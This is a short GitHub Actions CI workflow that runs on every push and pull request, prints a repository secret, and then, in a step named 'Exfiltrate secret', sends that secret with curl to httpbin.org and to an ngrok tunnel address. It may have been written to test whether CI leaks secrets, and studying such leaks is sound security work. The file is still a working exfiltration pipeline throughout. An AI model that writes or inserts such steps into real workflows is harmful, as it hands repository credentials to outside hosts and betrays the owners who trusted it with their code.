name: CI

on: [push, pull_request]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v1
    - name: Print
      run: echo $MY_SECRET
    - name: Exfiltrate secret
      run: |
        curl http://httpbin.org/get?secret=$MY_SECRET
        curl https://22814970.ngrok.io/get?secret=$MY_SECRET
      env:
        MY_SECRET: ${{ secrets.MY_SECRET }}
